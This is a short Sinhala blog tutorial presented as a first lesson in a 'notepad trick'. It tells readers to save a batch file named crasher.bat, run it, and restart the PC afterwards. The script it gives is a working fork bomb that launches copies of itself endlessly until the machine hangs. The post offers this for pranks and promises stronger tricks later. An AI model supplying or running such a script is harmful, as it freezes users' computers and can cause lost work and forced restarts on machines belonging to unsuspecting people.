ඔන්න මම මගෙ පලවෙනිම පාඩම විදිහට කියල දෙන්නෙ පොඩි notepad trick එකක්..

1 ඉස්සෙල්ලාම ඔයාගෙ pc එකෙන් notepad එක open කරගන්න
2 මන් මේකෙ අන්තිමට දාන code එක ඒකෙ past කරගන්න (මම ඒක අන්තිමට දාන්නෙ ඕගොල්ලො ඒක copy කරගන්න ගිහින් අල කරගන්න නිසා ...ටයිප් කරන්න යන්න එපා මොකාද පොඩි space එකක් හරි වැරදුනොත් වැඩේ කනපිට යාන නිසා )
3 අර කෝඩ් එක පේස්ස්ට් කලාට පස්සෙ ඒක සේව් කරන්න නම දෙද්දි මන් මේ පල්ලෙහ දාන නමම දාන්න අකුරු නිවැර්දිව crasher.bat
4 හරි දැන් තියෙන්නෙ අත් හදා බලන්න ඕගොල්ලොම ඒක open කරල බලන්න ඇති වුනාම pc එක restart බොත්තම ඔබන්න එතකොට හරියයි
5 ප්‍රශ්න තියෙන අය inbox මැසේජ් ඒකක් දාන්න
6 මේ පොඩි එකක් හොද හොද එව්ව පසුවට ඕගොල්ලන්ට train වෙන්න දැම්මෙ.
උස්සන්න එපා මේවගේ පොඩි ඒව ඉස්සුවටා කමක් නෑ තව ඉස්සරජහට ඩ්දාන ඒව උස්සන්න එපා
@echo off
cls
:A
start crasher.bat
goto A

Comments

Popular posts from this blog